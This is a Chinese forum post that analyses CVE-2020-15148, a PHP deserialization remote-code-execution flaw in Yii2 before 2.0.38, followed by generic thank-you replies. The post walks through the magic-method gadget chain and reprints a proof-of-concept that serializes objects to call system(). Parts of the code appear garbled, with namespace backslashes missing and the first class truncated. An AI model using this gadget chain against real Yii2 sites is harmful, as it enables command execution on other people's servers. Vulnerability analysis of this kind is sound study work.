搜索

查看: 3074|回复: 11

[PHP] CVE-2020-15148漏洞分析

[复制链接]
发表于 2023-5-4 17:04:35 | 显示全部楼层 |阅读模式
Editor 2023-5-4 17:04:35 3074 11 看全部
目录
  • 基础知识
  • Yii2
  • 魔术方法
  • 漏洞分析
  • 结语
    基础知识
    在学习该漏洞之前我们需要学习一下前置知识来更好的理解该漏洞的产生原因以及如何利用。 我们先来学习一下框架的基本信息以及反序列化漏洞的基本利用过程。

    Yii2
    Yii是一个基于组件的高性能PHP框架,用于开发大型Web应用。Yii采用严格的OOP编写,并有着完善的库引用以及全面的教程。而CVE-2020-15148则是在其版本YII2.0.38之前的一个反序列化漏洞,该漏洞在调用unserialize时,攻击者可通过构造特定的恶意请求执行任意命令,这也是常见的反序列化漏洞的利用过程。

    魔术方法
    提到PHP反序列化一定离不开魔术方法,这些方法通常会在达到一些特殊条件后就会执行,举个例子:
    __construct() //新建对象时调用
    我们编写下面的代码:

    20230224083030010.jpg

    20230224083030010.jpg


    当我们执行时new了一个类,这就会调用里面的魔术方法,从而输出语句。当然这只是最简单的魔术方法,下面给大家一个列表来进行参考:

    20230224083030011.jpg

    20230224083030011.jpg


    了解完以上知识点后我们开始对该漏洞进行分析。

    漏洞分析
    首先我们要搭建环境,最好搭建在本地方便调试,源码地址如下:
    github.com/yiisoft/yii…
    搭建完后我们首先找到漏洞切入点,也就是可能存在威胁的地方,结合上面对魔术方法的分析在 /vendor/yiisoft/yii2/db/BatchQueryResult.php下找到了可能存在漏洞的点,因为里面有个魔术方法在对象销毁时调用:

    20230224083030012.jpg

    20230224083030012.jpg


    __destruct()调用了reset()方法,方法里面的$this->_dataReader是可控的:
    public function reset()
    {
            if ($this->_dataReader !== null) {
                $this->_dataReader->close();
            }
    于是思考接下来要如何利用,根据POC的构造,假设我们将_dataReader变成类然后去调用close()方法,若类型没有close()方法,同时还有__call魔术方法,则会调用该魔术方法。我们找到faker/src/Faker/Generator.php:里面存在call方法且调用了foemat方法:
    public function format($formatter, $arguments = array())
        {
            return call_user_func_array($this->getFormatter($formatter), $arguments);
        }
    跟进这里:
    $this->getFormatter($formatter)
    看到存在可控参数:
    public function getFormatter($formatter)
    {
            if (isset($this->formatters[$formatter])) {
                return $this->formatters[$formatter];
            }
            foreach ($this->providers as $provider) {
                if (method_exists($provider, $formatter)) {
                    $this->formatters[$formatter] = array($provider, $formatter);
                    return $this->formatters[$formatter];
                }
            }
    this−>formatters[this - > formatters[this−>formatters[formatter] 有值,就返回其值,回看一下会发现值为:
    $formatter='close',$arguments=空
    即返回的第一个参数是可控的,我们便可以调用任意的无参方法,这里找到/vendor/yiisoft/yii2/rest/CreateAction.php:
    public function run()
        {
            if ($this->checkAccess) {
                call_user_func($this->checkAccess, $this->id);
            }
    this−>checkAccess,this->checkAccess,this−>checkAccess,this->id是可控的,那么就可以执行RCE。利用链如下:
    yii\db\BatchQueryResult::__destruct()->Faker\Generator::__call()->yii\rest\CreateAction::run()
    这里贴一个大佬们的POC:
    checkAccess = 'system';
                $this->id = 'phpinfo();';
            }
        }
    }
    namespace Faker{
        use yiirestCreateAction;
        class Generator{
            protected $formatters;
            public function __construct(){
                $this->formatters['close'] = [new CreateAction, 'run'];
            }
        }
    }
    namespace yiidb{
        use FakerGenerator;
        class BatchQueryResult{
            private $_dataReader;
            public function __construct(){
                $this->_dataReader = new Generator;
            }
        }
    }
    namespace{
        echo base64_encode(serialize(new yiidbBatchQueryResult));
    }
    ?>
    下面是传入构造好的payload对网站进行请求的结果,可以看到成功进行了命令执行。

    20230224083030013.jpg

    20230224083030013.jpg


    结语
    今天给大家带来的是CVE-2020-15148漏洞的简单分析,整体看下来还是很简单的,我们需要注意如何调用的魔术方法以及如何进行RCE,有兴趣的小伙伴可以自己去搭建环境进行测试,喜欢本文的朋友希望可以一键三连支持一下。
    以上就是CVE-2020-15148漏洞分析的详细内容,更多关于CVE-2020-15148漏洞的资料请关注知鸟论坛其它相关文章!
  • 回复

    使用道具 举报

    发表于 2023-6-28 20:05:26 | 显示全部楼层
    123456833 2023-6-28 20:05:26 看全部
    楼主太厉害了!楼主,I*老*虎*U!我觉得知鸟论坛真是个好地方!
    回复

    使用道具 举报

    发表于 2023-6-28 21:09:14 | 显示全部楼层
    风吹吹蛋蛋疼风w 2023-6-28 21:09:14 看全部
    感谢楼主的无私分享!要想知鸟论坛好 就靠你我他
    回复

    使用道具 举报

    发表于 2023-6-29 11:02:59 | 显示全部楼层
    永远爱你冰塘 2023-6-29 11:02:59 看全部
    我看不错噢 谢谢楼主!知鸟论坛越来越好!
    回复

    使用道具 举报

    发表于 2023-6-29 12:32:55 | 显示全部楼层
    123456868 2023-6-29 12:32:55 看全部
    这东西我收了!谢谢楼主!知鸟论坛真好!
    回复

    使用道具 举报

    发表于 2023-6-29 20:07:59 | 显示全部楼层
    惜颜705 2023-6-29 20:07:59 看全部
    感谢楼主的无私分享!要想知鸟论坛好 就靠你我他
    回复

    使用道具 举报

    发表于 2023-6-30 09:42:57 | 显示全部楼层
    落败的青春阳落s 2023-6-30 09:42:57 看全部
    这个帖子不回对不起自己!我想我是一天也不能离开知鸟论坛
    回复

    使用道具 举报

    发表于 2023-6-30 10:18:29 | 显示全部楼层
    dxf17 2023-6-30 10:18:29 看全部
    楼主太厉害了!楼主,I*老*虎*U!我觉得知鸟论坛真是个好地方!
    回复

    使用道具 举报

    发表于 2023-6-30 14:43:08 | 显示全部楼层
    啤酒瓶空了缓 2023-6-30 14:43:08 看全部
    楼主,大恩不言谢了!知鸟论坛是最棒的!
    回复

    使用道具 举报

    发表于 2023-7-3 09:05:52 | 显示全部楼层
    老橡树1 2023-7-3 09:05:52 看全部
    感谢楼主的无私分享!要想知鸟论坛好 就靠你我他
    回复

    使用道具 举报

    • 您可能感兴趣
    点击右侧快捷回复 【请勿灌水】
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则 返回列表

    RSS订阅| SiteMap| 小黑屋| 知鸟论坛
    联系邮箱E-mail:zniao@foxmail.com
    快速回复 返回顶部 返回列表